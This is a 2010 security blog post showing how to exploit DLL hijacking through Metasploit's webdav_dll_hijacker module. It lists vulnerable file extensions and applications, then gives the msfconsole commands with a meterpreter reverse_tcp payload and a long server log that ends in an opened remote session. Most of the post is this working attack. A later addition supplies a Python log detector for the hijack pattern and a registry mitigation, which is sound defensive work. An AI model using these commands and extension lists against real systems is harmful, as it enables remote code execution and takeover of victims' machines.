Tuesday, August 24, 2010

DLL Hijacking and metasploit part 2

Adding some more common applications that are vulnerable, with the file extensions that trigger the DLL load:


( windows live contact ) .contact
( Windows live mail ) .eml
( Opera ) .htm .html .mht .mhtml .xht .xhtm .xhtl
( Windows live mail ) .nws .rss
( Snagit ) .snag
( Snagit accessories ) .results
( Snagit profiles ) .snagprof
( Teamviewer ) .tvc .tvs
( Opera widgets ) .wgt

DLL Hijacking and metasploit

Following the excellent post on exploiting DLL hijacking from hdm (http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html), I made an initial list of file extensions that are exploitable on a clean install of Windows XP SP3.

Currently the list consists of only four extensions (leaving aside .exe files), and they are the following:

( group management ) .grp
( Digital ID File ) .p7c
( vCards ) .vcf
( address book files) .wab

Creating an extension list from the above and feeding it to Metasploit, we have the following:

./msfconsole
msf >  use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set EXTENSIONS "grp p7c vcf wab"               
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*]
[*] Exploit links are now available at \\xxx.xxx.xxx.xxx\documents\
[*]
[*] Using URL: http://xxx.xxx.xxx.xxx:80/
[*] Server started.

Now, on the Windows XP system, we browse to the URL above from Internet Explorer; after a while a folder with several documents having the specified extensions will appear. Clicking on any of them produces the following on the Metasploit console:


msf exploit(webdav_dll_hijacker) > [*] yyy.yyy.yyy.yyy:27383 GET => REDIRECT (/)
[*] yyy.yyy.yyy.yyy:27383 GET => DATA (/favicon.ico)
[*] yyy.yyy.yyy.yyy:27482 OPTIONS /
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27485 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27485 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/desktop.ini
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 404 (/documents/desktop.ini)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /documents/policy.p7c
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 File (/documents/policy.p7c)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /documents/wab32res.dll
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 File (/documents/wab32res.dll)
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27650 GET => DLL Payload
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /documents/rundll32.exe
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 404 (/documents/rundll32.exe)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 Top-Level Directory
[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /documents/rsaenh.dll
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] yyy.yyy.yyy.yyy:27652 GET => DLL Payload
[*] yyy.yyy.yyy.yyy:27656 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27656 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 Top-Level Directory
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:27654) at Tue Aug 24 11:38:57 +0300 2010

And here we have a nice Meterpreter session.
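The transcript above shows the tell-tale sequence: the client asks for the document (policy.p7c), and the application that opens it then probes the same remote directory for DLLs it expects to find next to it (wab32res.dll, rsaenh.dll) before the payload DLL is fetched. As an added example that is not part of the original post, the following Python script scans log lines in the same format for that per-client pattern; the sample lines and client addresses are constructed, and a real web proxy or WebDAV server log would first have to be mapped to the same "[*] host:port METHOD /path" shape.

```python
import re
from collections import defaultdict

# Constructed sample lines in the msfconsole format shown above (not a capture
# from the original post): one client opens policy.p7c and the handling
# application then probes the same WebDAV directory for DLL/EXE names.
SAMPLE_LOG = """\
[*] 10.0.0.5:27649 PROPFIND /documents/policy.p7c
[*] 10.0.0.5:27649 PROPFIND => 207 File (/documents/policy.p7c)
[*] 10.0.0.5:27650 PROPFIND /documents/wab32res.dll
[*] 10.0.0.5:27650 PROPFIND => 207 File (/documents/wab32res.dll)
[*] 10.0.0.5:27650 GET => DLL Payload
[*] 10.0.0.5:27650 PROPFIND /DOCUMENTS/rundll32.exe
[*] 10.0.0.5:27650 PROPFIND => 404 (/DOCUMENTS/rundll32.exe)
[*] 10.0.0.5:27652 PROPFIND /documents/rsaenh.dll
[*] 10.0.0.5:27652 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 10.0.0.5:27652 GET => DLL Payload
[*] 10.0.0.9:31000 PROPFIND /documents/report.vcf
[*] 10.0.0.9:31000 PROPFIND => 207 File (/documents/report.vcf)
"""

# Request lines only: "[*] host:port METHOD /path". Response lines ("=> 207 ...")
# and "GET => DLL Payload" carry no path and are skipped.
REQUEST = re.compile(r"^\[\*\] (?P<host>[\d.]+):\d+ (?P<method>PROPFIND|GET) (?P<path>/\S+)$")

DOC_EXTS = {"grp", "p7c", "vcf", "wab"}   # extensions the post lists as hijackable
PROBE_EXTS = {"dll", "exe"}               # names a search-order walk asks for


def find_hijack_probes(log_text):
    """Group requests by client. A client is flagged when, after requesting a
    document, it asks for a .dll/.exe in the same directory: that is the
    application walking the DLL search path into the remote share."""
    by_host = defaultdict(lambda: {"documents": [], "probes": []})
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        host, path = m.group("host"), m.group("path")
        directory, _, name = path.lower().rpartition("/")  # WebDAV paths are case-insensitive
        ext = name.rpartition(".")[2]
        entry = by_host[host]
        if ext in DOC_EXTS:
            entry["documents"].append(path)
        elif ext in PROBE_EXTS and any(
            d.lower().rpartition("/")[0] == directory for d in entry["documents"]
        ):
            entry["probes"].append(path)
    return {host: e for host, e in by_host.items() if e["probes"]}
```

On the endpoint side, the CWDIllegalInDllSearch registry value Microsoft published in KB2264107 the same month removes WebDAV shares (and optionally all remote shares or the current directory altogether) from the DLL search path, which is the loading pattern this transcript relies on.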

Next step: installing programs on the target system to identify more products that are vulnerable.